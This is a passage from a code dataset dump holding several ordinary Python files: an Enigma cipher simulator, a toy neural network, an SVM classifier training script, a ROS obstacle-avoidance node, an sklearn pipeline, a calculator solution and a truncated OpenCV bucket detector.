_decode_list(value)\n elif isinstance(value, dict):\n value = _decode_dict(value)\n rv[key] = value\n return rv\n\ndef _decode_list(data):\n rv = []\n for item in data:\n if isinstance(item, unicode):\n item = item.encode('utf-8')\n elif isinstance(item, list):\n item = _decode_list(item)\n elif isinstance(item, dict):\n item = _decode_dict(item)\n rv.append(item)\n return rv \n\n \n\nif __name__ == \"__main__\":\n # 使用sys.argv参数运行\n # app.worker_main()\n\n # 使用自定义参数运行\n # --beat同时开启beat模式,即运行按计划发送task的实例\n # 应确保全局只有一份同样的beat\n app.worker_main([\"worker\",\"--loglevel=debug\",\"-n\",\"addreward.%h\"])","sub_path":"addreward.py","file_name":"addreward.py","file_ext":"py","file_size_in_byte":3045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"342732109","text":"import string\n\nrotorlist1 = list(\"EKMFLGDQVZNTOWYHXUSPAIBRCJ\")\nrotorlist2 = list(\"AJDKSIRUXBLHWTMCQGZNPYFVOE\")\nrotorlist3 = list(\"BDFHJLCPRTXVZNYEIWGAKMUSQO\")\nrotorlist4 = list(\"ESOVPZJAYQUIRHXLNFTGKDCMWB\")\nrotorlist5 = list(\"VZBRGITYUPSDNHLXAWMJQOFECK\")\nrotorlist6 = list(\"JPGVOUMFYQBENHZRDKASXLICTW\")\nrotorlist7 = list(\"NZJHGRCXMYSWBOUFAIVLPEKQDT\")\nrotorlist8 = list(\"FKQHTLXOCBJSPDZRAMEWNIUYGV\")\n\nalphabet = list(string.ascii_uppercase)\nrotor = dict()\nrotor[1] = {a:x for (a,x) in zip(alphabet, rotorlist1)}\nrotor[2] = {a:x for (a,x) in zip(alphabet, rotorlist2)}\nrotor[3] = {a:x for (a,x) in zip(alphabet, rotorlist3)}\nrotor[4] = {a:x for (a,x) in zip(alphabet, rotorlist4)}\nrotor[5] = {a:x for (a,x) in zip(alphabet, rotorlist5)}\n#rotor[6] = {a:x for (a,x) in zip(alphabet, rotorlist6)}\n#rotor[7] = {a:x for (a,x) in zip(alphabet, rotorlist7)}\n#rotor[8] = {a:x for (a,x) in zip(alphabet, rotorlist8)}\n\n# Create the inverse dictionaries\ninv_rotor = dict()\nfor i in range(1, 6):\n inv_rotor[i] = {v:k for k, v in rotor[i].items()}\n\nstepping = dict()\nstepping[1] = \"Q\"\nstepping[2] = \"E\"\nstepping[3] = \"V\"\nstepping[4] = \"J\"\nstepping[5] = \"Z\"\n\nreflectorlist = list(\"YRUHQSLDPXNGOKMIEBFZCWVJAT\")\nreflector = {a:x for (a,x) in zip(alphabet, reflectorlist)}\n\nclass Enigma:\n def __init__(self, rotor_order, ring_setting = \"AAA\", rotor_pos = \"AAA\", plugs = []):\n # note that rotor_pos should be of the form \"GJD\" \n # and ring_setting should be of the form \"SNK\"\n self.rotor_order = [int(x) for x in rotor_order]\n self.rotor_pos = list(rotor_pos)\n self.ring_setting = list(ring_setting)\n self.stecker_dict = {a:a for a in alphabet}\n for plug in plugs:\n self.stecker_dict[plug[0]] = plug[1]\n self.stecker_dict[plug[1]] = plug[0]\n\n @staticmethod\n def stepping_point(rotor_index):\n return stepping[rotor_index]\n\n # Cycles through capital letters in ascii.\n # i.e. A -> B, ..., Z -> A\n @staticmethod\n def increment_letter(letter):\n return chr((ord(letter)-65+1)%26+65)\n\n def add_to_letter(self, letter, increase):\n return chr((ord(letter)-65+increase)%26+65)\n\n @staticmethod\n def step_rotors_explicit(rotor_pos, middle_notch, right_notch):\n # Increment right rotor\n step_middle = (rotor_pos[2] == right_notch)\n step_left = (rotor_pos[1] == middle_notch)\n\n # Always step the fast rotor\n rotor_pos[2] = Enigma.increment_letter(rotor_pos[2])\n\n # Account for the double step. Middle rotor steps if the right rotor\n # is at the notch position, or if the left rotor steps, i.e. if the\n # middle rotor is at its notch position\n if step_middle or step_left:\n rotor_pos[1] = Enigma.increment_letter(rotor_pos[1])\n if step_left:\n rotor_pos[0] = Enigma.increment_letter(rotor_pos[0])\n return rotor_pos\n\n def step_rotors(self):\n self.rotor_pos = self.step_rotors_explicit(self.rotor_pos, stepping[self.rotor_order[1]], stepping[self.rotor_order[2]])\n\n # Applies the given rotors\n def apply_rotors(self, left_rotor, middle_rotor, right_rotor, plaintext_character):\n # Letter passes through the rotors right to left\n ciphered = self.apply_rotor(right_rotor, self.ring_setting[2], self.rotor_pos[2], plaintext_character)\n ciphered = self.apply_rotor(middle_rotor, self.ring_setting[1], self.rotor_pos[1], ciphered)\n ciphered = self.apply_rotor(left_rotor, self.ring_setting[0], self.rotor_pos[0], ciphered)\n # Passes through reflector\n ciphered = reflector[ciphered]\n # Passes through rotors left to right\n ciphered = self.apply_inverse_rotor(left_rotor, self.ring_setting[0], self.rotor_pos[0], ciphered)\n ciphered = self.apply_inverse_rotor(middle_rotor, self.ring_setting[1], self.rotor_pos[1], ciphered)\n ciphered = self.apply_inverse_rotor(right_rotor, self.ring_setting[2], self.rotor_pos[2], ciphered) \n return ciphered\n\n def apply_rotor(self, rotor_num, ring_setting, rotor_pos, plaintext_character):\n # calculate change thanks to rotor position\n change_pos = ord(rotor_pos)-65\n # calculate change thanks to ring setting\n change_setting = ord(ring_setting)-65\n increase = (change_pos - change_setting)%26\n\n ciphered = self.add_to_letter(plaintext_character, increase)\n ciphered = rotor[rotor_num][ciphered]\n ciphered = self.add_to_letter(ciphered, -increase)\n return ciphered\n\n def apply_inverse_rotor(self, rotor_num, ring_setting, rotor_pos, plaintext_character):\n # calculate change thanks to rotor position\n change_pos = ord(rotor_pos)-65\n # calculate change thanks to ring setting\n change_setting = ord(ring_setting)-65\n increase = (change_pos - change_setting)%26\n \n ciphered = self.add_to_letter(plaintext_character, increase)\n ciphered = inv_rotor[rotor_num][ciphered]\n ciphered = self.add_to_letter(ciphered, -increase)\n return ciphered\n\n def apply_steckerboard(self, stecker_dict, plaintext_character):\n return stecker_dict[plaintext_character]\n\n def cipher(self, letter):\n self.step_rotors()\n ciphered = self.apply_steckerboard(self.stecker_dict, letter)\n ciphered = self.apply_rotors(self.rotor_order[0], self.rotor_order[1], self.rotor_order[2], ciphered)\n ciphered = self.apply_steckerboard(self.stecker_dict, ciphered)\n return ciphered\n\n def print_with_spaces(self, text):\n # prints a chunk of text (assumed to be without spaces) with spaces\n # after every 5 characters\n count = 0\n for char in text:\n print(char, end=\"\")\n count += 1\n if (count % 5 == 0):\n print(\" \", end=\"\")\n print()\n\n\n def encrypt(self, text):\n # note that text cannot have spaces\n cipher_text = \"\"\n for char in text:\n cipher_text += self.cipher(char)\n return cipher_text \n \n","sub_path":"enigma.py","file_name":"enigma.py","file_ext":"py","file_size_in_byte":6087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"64381433","text":"import numpy as py\r\nimport random\r\ndef sigmoid(x):##sigmoid func will map any value to 0 to 1 range.it convert numbers into probablities \r\n return 1/(1+py.exp(-x))\r\ndef sigmoid_derivative(x):##this function is to generate derivative of an output\r\n return x*(1-x)\r\n\r\ntrainging_inputs=py.array([[0,0,1],\r\n [0,1,1],\r\n [1,0,1],\r\n [1,1,1]]) \r\ntrainging_output=py.array([[0,1,1,0]]).T##.T is for transpose of a matrix\r\npy.random.seed(1)##By using this func number will still be randomly distributed but they will be distributed exactly the same way each time we train\r\nsynaptic_weights=2*py.random.random((3,1))-1##generate random weights of dimension (3,1) beacuse we have 3 input and 1 output layer\r\nprint('weights:')\r\nprint(synaptic_weights)\r\nfor i in range(10000):\r\n input_layer=trainging_inputs\r\n output=sigmoid(py.dot(input_layer,synaptic_weights))##here we are taking dot prodect of two matrices and then putting it in sigmoid func\r\n error=trainging_output-output##Error can be found by subtracting actual output from predicted output\r\n adjustments=error*sigmoid_derivative(output)##here we are making adjusments w.r.t error\r\n synaptic_weights+=py.dot(input_layer.T,adjustments)##Here we are adding previous weights with dot product of(input_layer and adjusments) to update weights.\r\n \r\n\r\nprint(\"Updated final Weights:\")\r\nprint(synaptic_weights)\r\nprint('output after updated weights\\n')\r\nprint(output)\r\n","sub_path":"neural network.py","file_name":"neural network.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"263318245","text":"\n#################################################\n# Author : CIEL \n# Date : 2017-10-20\n# Function : 用平衡的数据集训练模型\n################################################# \n\n#载入需要的库\nimport numpy as np #科学计算库\nimport pandas as pd #数据分析\nimport os\n\nfrom sklearn import cross_validation #交叉验证库\nfrom sklearn import metrics\nfrom sklearn import datasets \nfrom sklearn import preprocessing \nfrom sklearn import neighbors \nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis \nfrom sklearn.ensemble import RandomForestClassifier #随机森林算法库\nfrom sklearn.grid_search import GridSearchCV\nfrom sklearn.model_selection import train_test_split \nfrom sklearn.model_selection import StratifiedKFold \nfrom sklearn import svm\nfrom sklearn.linear_model import SGDClassifier\nfrom sklearn.svm import LinearSVC\nfrom sklearn.learning_curve import learning_curve\nfrom sklearn.cross_validation import cross_val_score\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.svm import SVC\nfrom time import time \nfrom sklearn.naive_bayes import MultinomialNB \nfrom sklearn import tree \nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.ensemble import ExtraTreesClassifier\nfrom sklearn.ensemble import AdaBoostClassifier\nfrom sklearn.ensemble import GradientBoostingClassifier \nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\nfrom sklearn.discriminant_analysis import QuadraticDiscriminantAnalysis\nfrom sklearn.metrics import classification_report \nfrom sklearn.metrics import precision_recall_curve, roc_curve, auc \nfrom sklearn.externals import joblib\nimport matplotlib.pylab as plt\nfrom pandas import DataFrame\n\n# 读取原始数据的csv文件,生成训练集和验证集的数据字典\ndef setDict_train_validation(originDataFile):\n if os.path.exists(originDataFile):\n # 生成title\n listTitle = []\n #listTitle.append('ID')\n listTitle.append('class')\n for i in range(1, 343):\n listTitle.append('feature' + str(i))\n \n # read the csv file\n # pd.read_csv: 封装在DataFrame数据结构中\n dataMatrix = np.array(pd.read_csv(originDataFile, header=None, skiprows=1, names=listTitle))\n \n # 获取样本总数(rowNum)和每个样本的维度(colNum: 类别+特征,共343维)\n rowNum, colNum = dataMatrix.shape[0], dataMatrix.shape[1]\n \n sampleData = [] # 样本特征\n sampleClass = [] # 样本类别\n for i in range(0, rowNum): # 遍历全部样本\n #tolist():转为list类型\n tempList=dataMatrix[i,:].tolist() # 第i个样本\n #tempList = list(ddd) # 第i个样本\n sampleClass.append(tempList[0]) # 类别\n sampleData.append(tempList[1:]) # 特征\n sampleM = np.array(sampleData) # 二维矩阵,一行是一个样本,行数=样本总数,列数=样本特征数\n classM = np.array(sampleClass) # 一维列向量,每个元素是对应每个样本的所属类别\n \n # from sklearn.model_selection import StratifiedKFold\n # 调用StratifiedKFold生成训练集和测试集\n skf = StratifiedKFold(n_splits=5) #5折,每次分折都保持原数据集每个类别的样本百分比\n # 大括号{ }:代表dict字典数据类型,字典是由键对值组组成。冒号':'分开键和值,逗号','隔开组。\n setDict = {} # 创建字典,用于存储生成的训练集和测试集\n count = 1\n for trainI, testI, in skf.split(sampleM, classM): # skf.split:生成训练样本索引(trainI)和测试样本索引(testI)\n #print('trainI')\n #print(trainI.shape)\n #print('testI: %d')\n #print(testI.shape)\n \n # train1 = SVC1_train; test1 = validation_data\n \n trainSTemp = [] # 存储当前循环抽取出的训练样本特征\n trainCTemp = [] # 存储当前循环抽取出的训练样本类别\n testSTemp = [] # 存储当前循环抽取出的测试样本特征\n testCTemp = [] # 存储当前循环抽取出的测试样本类别\n \n # ------------------- 生成训练集 ------------------- \n # 第i折中训练数据:trainI\n trainIndex = trainI.tolist() # 训练样本索引\n for t1 in range(0, len(trainIndex)):\n trainNum = trainIndex[t1]\n trainSTemp.append((sampleM[trainNum, :]).tolist())\n trainCTemp.append(((classM)[trainNum]).tolist())\n # 第i折中测试数据:testI\n testIndex = testI.tolist() # 测试样本索引\n for t2 in range(0, len(testIndex)):\n testNum = testIndex[t2]\n testSTemp.append((sampleM[testNum, :]).tolist())\n testCTemp.append(((classM)[testNum]).tolist()) \n \n # 如果i=1,则生成训练数据和验证数据的字典\n if count == 1: \n # 生成训练数据\n setDict['trainFeature'] = np.array(trainSTemp) # 特征\n setDict['trainClass'] = np.array(trainCTemp) # 类别\n # 生成验证数据\n setDict['validationFeature'] = np.array(testSTemp) # 特征\n setDict['validationClass'] = np.array(testCTemp) # 类别\n \n #print(np.array(trainSTemp).shape)\n #print(np.array(trainCTemp).shape)\n #print(np.array(testSTemp).shape)\n #print(np.array(testCTemp).shape)\n \n else: # i不等于1,退出for循环\n break\n \n count += 1\n #print(setDict)\n return setDict\n else: #读取csv文件失败\n print('No such file or directory!') \n\n\n# 将训练集和验证集的字典分别写入csv文件,生成train.csv和validation.csv\nimport csv\ndef setCSV_train_validation(train_validation_dict, trainFile, validationFile):\n # ------------ train.csv ------------\n with open(trainFile, \"w\", newline=\"\") as train_file:\n csvWriter = csv.writer(train_file)\n # --------- 先写columns_name -----------\n columnsName = []\n columnsName.append('class')\n for i in range(1, 343):\n columnsName.append('feature' + str(i))\n csvWriter.writerow(columnsName)\n # ------------ 再写数据 --------------\n trainFeature = train_validation_dict['trainFeature']\n trainClass = train_validation_dict['trainClass']\n #print(trainClass.shape[0]) # 输出训练数据的样本数\n #print(trainFeature)\n #print(trainClass)\n for i in range(1, trainClass.shape[0] + 1): # 写train.csv的每行.trainClass.shape[0]为训练数据的样本数\n rowTemp = []\n rowTemp.append(trainClass[i-1])\n for j in range(0, 342):\n rowTemp.append(trainFeature[i-1, j])\n csvWriter.writerow(rowTemp)\n \n # ------------ validation.csv ------------\n with open(validationFile, \"w\", newline=\"\") as validation_file:\n csvWriter = csv.writer(validation_file)\n # --------- 先写columns_name -----------\n columnsName = []\n columnsName.append('class')\n for i in range(1, 343):\n columnsName.append('feature' + str(i))\n csvWriter.writerow(columnsName)\n # ------------ 再写数据 --------------\n validationFeature = train_validation_dict['validationFeature']\n validationClass = train_validation_dict['validationClass']\n #print(validationClass.shape[0]) # 验证数据的样本数\n #print(validationFeature)\n #print(validationClass)\n for i in range(1, validationClass.shape[0] + 1): # validation.csv的每行.validationClass.shape[0]为验证数据的样本数\n rowTemp = []\n rowTemp.append(validationClass[i-1])\n for j in range(0, 342):\n rowTemp.append(validationFeature[i-1, j])\n csvWriter.writerow(rowTemp)\n\n# 读取train.csv文件,生成训练数据的字典,里面含k组采样数据\n# 函数返回一个字典:键为集合编号(trainFeature, trainClass)\ndef loadTrainDataDict(trainFile):\n if os.path.exists(trainFile):\n # 生成title\n listTitle = []\n listTitle.append('class')\n for i in range(1, 343): # 1~342\n listTitle.append('feature' + str(i))\n \n # read the csv file\n # pd.read_csv: 封装在DataFrame数据结构中\n dataMatrix = np.array(pd.read_csv(trainFile, header=None, skiprows=1, names=listTitle))\n \n # 获取样本总数(rowNum)和每个样本的维度(colNum: 类别+特征,共343维)\n rowNum, colNum = dataMatrix.shape[0], dataMatrix.shape[1]\n #print(rowNum)\n #print(colNum)\n \n sampleData = [] # 样本特征\n sampleClass = [] # 样本类别\n for i in range(0, rowNum): # 遍历全部样本\n #tolist():转为list类型\n tempList=dataMatrix[i,:].tolist() # 第i个样本\n sampleClass.append(tempList[0]) # 类别\n sampleData.append(tempList[1:]) # 特征\n sampleM = np.array(sampleData) # 二维矩阵,一行是一个样本,行数=样本总数,列数=样本特征数\n classM = np.array(sampleClass) # 一维列向量,每个元素是对应每个样本的所属类别\n \n setTrainDict = {} # 创建字典,用于存储生成的特征和类别\n setTrainDict['trainFeature'] = np.array(sampleM)\n setTrainDict['trainClass'] = np.array(classM)\n\n print (\"TrainDict:\")\n #print(np.array(sampleM).shape)\n #print(np.array(classM).shape)\n print(setTrainDict)\n \n return setTrainDict\n else: #读取csv文件失败\n print('No such file or directory!') \n \n \n# 读取validation.csv文件,生成验证数据的字典\n# 函数返回一个字典:键为集合编号(validationFeature, validationClass)\ndef loadValidationDataDict(validationFile):\n if os.path.exists(validationFile):\n # 生成title\n listTitle = []\n listTitle.append('class')\n for i in range(1, 343):\n listTitle.append('feature' + str(i))\n \n # read the csv file\n # pd.read_csv: 封装在DataFrame数据结构中\n dataMatrix = np.array(pd.read_csv(validationFile, header=None, skiprows=1, names=listTitle))\n \n # 获取样本总数(rowNum)和每个样本的维度(colNum: 类别+特征,共343维)\n rowNum, colNum = dataMatrix.shape[0], dataMatrix.shape[1]\n \n sampleData = [] # 样本特征\n sampleClass = [] # 样本类别\n for i in range(0, rowNum): # 遍历全部样本\n #tolist():转为list类型\n tempList=dataMatrix[i,:].tolist() # 第i个样本\n sampleClass.append(tempList[0]) # 类别\n sampleData.append(tempList[1:]) # 特征\n sampleM = np.array(sampleData) # 二维矩阵,一行是一个样本,行数=样本总数,列数=样本特征数\n classM = np.array(sampleClass) # 一维列向量,每个元素是对应每个样本的所属类别\n \n setValidationDict = {} # 创建字典,用于存储生成的特征和类别\n setValidationDict['validationFeature'] = np.array(sampleM)\n setValidationDict['validationClass'] = np.array(classM)\n\n print (\"ValidationDict:\")\n #print(np.array(sampleM).shape)\n #print(np.array(classM).shape)\n print(setValidationDict)\n \n return setValidationDict\n else: #读取csv文件失败\n print('No such file or directory!') \n \n#支持向量机(Support Vector Machine):SVC \ndef SVC(): \n # 将probability设为True,可以计算每个样本到各个类别的概率\n # 20170926:全部采用默认参数\n #clf = svm.SVC(probability = True) \n \n # 20171020:采用rbf核函数,C和gamma为libsvm的寻优结果\n clf = svm.SVC(kernel='rbf', random_state=0, gamma=0.0001220703125, C=2048.0)\n return clf \n\n\n# 计算识别率\n# modelClass为模型判断的类别,preClass为先验类别\ndef getRecognitionRate(modelClass, preClass):\n validationNum = len(modelClass) # 验证集大小\n rightNum =0 # 分类正确的验证样本个数\n # print('验证集大小')\n # print(validationNum)\n for i in range(0, validationNum):\n if modelClass[i] == preClass[i]:\n rightNum += 1\n # print('正确分类的样本数')\n # print(rightNum)\n return float(rightNum)/ float(validationNum)\n\n# SVC模型的训练\ndef SVC_model(trainDict, validationDict): # 输入参数为:训练集的字典,验证集的字典\n # 获取第i个SVC分类器 \n clf_SVC = SVC() \n \n #SVC_rate = 0.0 # SVC_rate用于将每个SVC模型的所有识别率累加\n SVC_predict_result = [] # SVC_predict_result记录每个SVC模型对验证数据所属类别的判断\n \n # 训练数据\n trainFeatureMatrix = trainDict['trainFeature'] #训练数据的特征\n trainClass = trainDict['trainClass'] #训练数据的类别\n #print(trainFeatureMatrix)\n #print(trainClass)\n \n start = time()\n print('start training model ...')\n \n #训练SVC模型\n clf_SVC.fit(trainFeatureMatrix, trainClass)\n \n # 保存模型\n print('saving SVC model ...')\n joblib.dump(clf_SVC, 'clf.model')\n \n end = time()\n print('用时 %.5f seconds.' % (end-start))\n \n# 加载模型,并预测数据\n# dataDict为验证样本的数据字典\ndef predictClass_new(validationDict): \n # 验证数据\n validationFeatureMatrix = validationDict['validationFeature'] #特征\n validationClass = validationDict['validationClass'] #类别\n \n # 加载SVC模型\n print('加载SVC模型')\n SVCmodel = joblib.load('clf.model')\n \n #计算SVC模型对验证数据的类别判断结果\n SVCpredictClass = SVCmodel.predict(validationFeatureMatrix) # predict(X): 返回X的分类(二分类,返回0和1)\n SVC_predict_result = SVCpredictClass.tolist()\n #print('SVC_predict_clf_result')\n #print(SVC_predict_result) \n \n # ----------------------------- 模型表现 ----------------------------- \n # classification_report():打印分类结果报告\n print('\\n')\n print('SVC classification report')\n print(classification_report(validationClass, SVC_predict_result, target_names = ['neg', 'pos']))\n SVC_rate = getRecognitionRate(SVC_predict_result, validationClass) # 验证集的识别率\n print(\"SVC precision:\", SVC_rate)\n \n\ndef main():\n '''\n # --------------------- step1. 生成训练集的csv文件(train.csv)和验证集的csv文件(validation.csv) ---------------------\n # 原始数据的csv文件\n #originDataFile = 'F:\\Code\\bagging-light-classification\\\\originData.csv' #注意:该csv文件没有'ID'列\n originDataFile = 'originData.csv' #注意:该csv文件没有'ID'列\n '''\n # 生成的训练集csv文件和验证集csv文件\n #trainDataFile = 'F:\\Code\\bagging-light-classification\\\\train.csv' #注意:该csv文件没有'ID'列\n #validationDataFile = 'F:\\Code\\bagging-light-classification\\\\validation.csv' #注意:该csv文件没有'ID'列\n trainDataFile = '20170925BalanceTrain.csv' #注意:该csv文件没有'ID'列\n validationDataFile = 'validation.csv' #注意:该csv文件没有'ID'列\n \n '''\n # --------------------- 如果已经生成了train.csv和validation.csv就没有必要执行下面两行程序 -----------------\n print('生成训练集的csv文件和验证集的csv文件') \n originDict = setDict_train_validation(originDataFile)\n setCSV_train_validation(originDict, trainDataFile, validationDataFile)\n '''\n \n # --------------------- step2. 生成训练集和验证集的数据字典 ---------------------\n print('生成训练数据字典')\n # 生成训练集的数据字典\n trainDict = loadTrainDataDict(trainDataFile)\n\n print('生成验证数据字典')\n # 生成验证集的数据字典:{ validationFeature, validationClass }\n validationDict = loadValidationDataDict(validationDataFile)\n \n # --------------------- step3. 训练模型,SVC ---------------------\n print('start training SVC model')\n SVC_model(trainDict, validationDict)\n \n # --------------------- step4. 加载SVC模型,对验证集进行验证 ---------------------\n print('验证模型')\n predictClass_new(validationDict)\n \n# 在python编译器读取源文件的时候会执行它找到的所有代码,\n# 而在执行之前会根据当前运行的模块是否为主程序而定义变量__name__的值为__main__还是模块名。\n# 因此,该判断语句为真的时候,说明当前运���的脚本为主程序,而非主程序所引用的一个模块。\n# 这在当你想要运行一些只有在将模块当做程序运行时而非当做模块引用时才执行的命令,只要将它们放到if __name__ == \"__main__:\"判断语句之后就可以了。\nif __name__ == '__main__': \n start = time()\n # print('开始训练模型\\n')\n \n main()\n \n print('\\n')\n # print('训练结束')\n end = time()\n print('用时 %.5f seconds.' % (end-start))\n\n\n\n\n\n\n\n","sub_path":"SVC_clf/20171020+SVC_clf+with pixel pos.py","file_name":"20171020+SVC_clf+with pixel pos.py","file_ext":"py","file_size_in_byte":17665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"585769061","text":"#!/usr/bin/env python\nimport rospy\nfrom std_msgs.msg import Float32\nfrom std_msgs.msg import Int32\nfrom geometry_msgs.msg import Twist\nfrom sensor_msgs.msg import Range\nfrom custom_msg.msg import ultrasonic_msg\nfrom custom_msg.msg import obavoid_flag_x_z\nmessage = obavoid_flag_x_z()\n[r1,r2,r3]=[0.0,0.0,0.0]\ndef f1(msg,pub):\n\tglobal r1,r2,r3\n\tr1=msg.r1\n\tr2=msg.r2\n\tr3=msg.r3\n\tob_avoid(pub)\n\ndef forward():\n\tmessage.x = 0.7\n\tmessage.z = 0\ndef stop():\n\tmessage.x = 0\n\tmessage.z = 0\ndef backward():\n\tmessage.x = -0.7\n\tmessage.z = 0\ndef backward_right():\n\tmessage.x = -0.2\n\tmessage.z = -0.2\ndef sharp_right_turn(): \n\tmessage.x = 0\n\tmessage.z = -0.5\n\t\ndef sharp_left_turn():\n\tmessage.x = 0\n\tmessage.z = 0.5\n\ndef soft_right_turn(): \n\tmessage.x = 0.7\n\tmessage.z = -0.5\n\t\ndef soft_left_turn():\n\tmessage.x = 0.7\n\tmessage.z = 0.5\n\ndef ob_avoid(pub):\n\tglobal r1,r2,r3,message\n\tif r1>2.5 and r2>2.5 and r3>2.5:\n\t\tforward()\n\t\tmessage.flag=1\n\t\tprint(\"...going forward\")\t\t\t\n\telif r1<2.5 and r2<2.5 and r3<2.5:\n\t\tbackward()\n\t\tmessage.flag=0\n\t\tprint(\"...going backward\")\n\telif r1>2.5 and r2>2.5 and r3<2.5:\n\t\tsoft_left_turn()\n\t\tmessage.flag=0\n\t\tprint(\"...soft left turn\")\n\telif r1<2.5 and r2>2.5 and r3>2.5:\n\t\tsoft_right_turn()\n\t\tmessage.flag=0\n\t\tprint(\"...soft right turn\")\n\telif r1>2.5 and r2<2.5 and r3<2.5:\n\t\tsharp_left_turn()\n\t\tmessage.flag=0\n\t\tprint(\"...sharp left turn\")\n\telif r1<2.5 and r2<2.5 and r3>2.5:\n\t\tsharp_right_turn()\n\t\tmessage.flag=0\n\t\tprint(\"...sharp right turn\")\n\telif r1>2.5 and r2<2.5 and r3>2.5:\n\t\tsharp_right_turn()\n\t\tmessage.flag=0\n\t\tprint(\"...sharp right turn\")\n\telif r1<4 and r2>2.5 and r3<4:\n\t\tforward()\n\t\tmessage.flag=1\n\t\tprint(\"***going forward\")\n\telif r1<1.5 and r2>2.5 and r3<1.5:\n\t\tbackward_right()\n\t\tmessage.flag=0\n\t\tprint(\"***going backward_right\")\n \t\t#print(\"***going backward_right\")\n\telse:\n\t\tforward()\n\t\tmessage.flag=1\n\t\tprint(\"...going forward\")\t\t\n\tpub.publish(message)\n\nrospy.init_node('ob_avoid5', anonymous=True)\npub = rospy.Publisher('/obavoid_flag_x_z_topic', obavoid_flag_x_z, queue_size=50)\t\nultrasonic_msg_sub = rospy.Subscriber('/ultrasonic_msg_topic',ultrasonic_msg,f1,pub)\nrospy.spin()\n\n\n","sub_path":"envision/src/bot/src/obavoid5.py","file_name":"obavoid5.py","file_ext":"py","file_size_in_byte":2124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"550430722","text":"from sklearn.pipeline import Pipeline\nfrom sklearn.linear_model import Lasso\nfrom sklearn.preprocessing import MinMaxScaler\nfrom regression_model import preprocessors as pp\nfrom regression_model.config import configuracion\n\n\npreprocessor_pipe = Pipeline(\n [\n ('categorical_imputer',\n pp.CategoricalImputer(variables=configuracion.CATEGORICAL_VARS_WITH_NA)),\n ('numerical_inputer',\n pp.NumericalImputer(variables=configuracion.NUMERICAL_VARS_WITH_NA)),\n ('temporal_variable',\n pp.TemporalVariableEstimator(\n variables=configuracion.TEMPORAL_VARS,\n reference_variable=configuracion.DROP_FEATURES)),\n ('rare_label_encoder',\n pp.RareLabelCategoricalEncoder(\n tol=0.01,\n variables=configuracion.CATEGORICAL_VARS)),\n ('categorical_encoder',\n pp.CategoricalEncoder(variables=configuracion.CATEGORICAL_VARS)),\n ('log_transformer',\n pp.LogTransformer(variables=configuracion.NUMERICALS_LOG_VARS)),\n ('drop_features',\n pp.DropUnecessaryFeatures(variables_to_drop=configuracion.DROP_FEATURES)),\n ('scaler', MinMaxScaler()),\n ('Linear_model', Lasso(alpha=0.005, random_state=0))\n ]\n)\n\n\n\n","sub_path":"build/lib/regression_model/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"74042019","text":"'''\nImplement a basic calculator to evaluate a simple expression string.\n\nThe expression string may contain open ( and closing parentheses ), the plus + or minus sign -, \nnon-negative integers and empty spaces .\n\nExample 1:\n\nInput: \"1 + 1\"\nOutput: 2\nExample 2:\n\nInput: \" 2-1 + 2 \"\nOutput: 3\nExample 3:\n\nInput: \"(1+(4+5+2)-3)+(6+8)\"\nOutput: 23\n'''\n\nfrom collections import deque\n\ndef evaluate(exp):\n exp += ['+']\n stack, sign = list(), '+'\n for ch in exp:\n if type(ch) is int:\n num = ch\n else:\n if sign == '+': stack.append(num)\n if sign == '-': stack.append(-num)\n if sign == '*': stack.append(stack.pop()*num)\n if sign == '/': stack.append(int(stack.pop()/num))\n sign = ch\n\n return sum(stack) \n\ndef build(exp):\n exp = exp.replace(' ', '')\n new_exp, num = list(['(']), 0 \n \n for ch in exp:\n if ch.isdigit():\n num = num*10 + int(ch)\n else:\n if num: new_exp.append(num)\n num = 0\n new_exp.append(ch)\n \n if num: new_exp.append(num)\n new_exp.append(')')\n \n return new_exp\n\ndef basic_calculator_two(exp):\n exp = build(exp)\n stack = []\n for val in exp:\n if val != ')':\n stack.append(val)\n else:\n partial_exp = deque()\n while stack[-1] != '(':\n partial_exp.appendleft(stack.pop())\n stack.pop()\n stack.append(evaluate(partial_exp))\n return sum(stack)\n\n","sub_path":"algorithms/math/basic_calculator_II.py","file_name":"basic_calculator_II.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"639020503","text":"#!/usr/bin/env python\nimport roslib\nroslib.load_manifest('bucket_detector')\nimport sys\nimport rospy\nimport numpy as np\nimport cv2\nfrom std_msgs.msg import String\nfrom sensor_msgs.msg import CompressedImage, Image\nfrom cv_bridge import CvBridge, CvBridgeError\n\n\n\nclass image_converter:\n\tdef __init__(self):\n\t\tself.bridge = CvBridge()\n\t\tself.image_sub = rospy.Subscriber('/usb_cam_front/image_raw/compressed', CompressedImage, self.callback)\n\t\n\tdef callback(self,data):\n\t\tcv_image = self.bridge.compressed_imgmsg_to_cv2(data, \"bgr8\")\n\t\thsv = cv2.cvtColor(cv_image, cv2.COLOR_BGR2HSV)\n\n\n\t\tupper_red = np.array([220, 150, 150])\n\t\tlower_red= np.array([0, 0, 0])\n\t\t\n\t\tmask = cv2.inRange(hsv, lower_red, upper_red)\n\t\tkernel = np.ones((5,5), np.uint8)\n\t\t\n\t\tmask = cv2.erode(mask, kernel, iterations = 1)\n\t\tmask = cv2.dilate(mask, kernel, iterations = 1)\n\t\t\n\t\tres = cv2.bitwise_and(hsv, hsv, mask=mask)\n\n\t\tim2, cnts, hierarchy = cv2.findContours(mask.copy(), cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\t\tlargestArea = 0\n\t\tlargestRect = None\n\t\tfor c in cnts:\n\t\t\tif cv2.contourArea(c) < 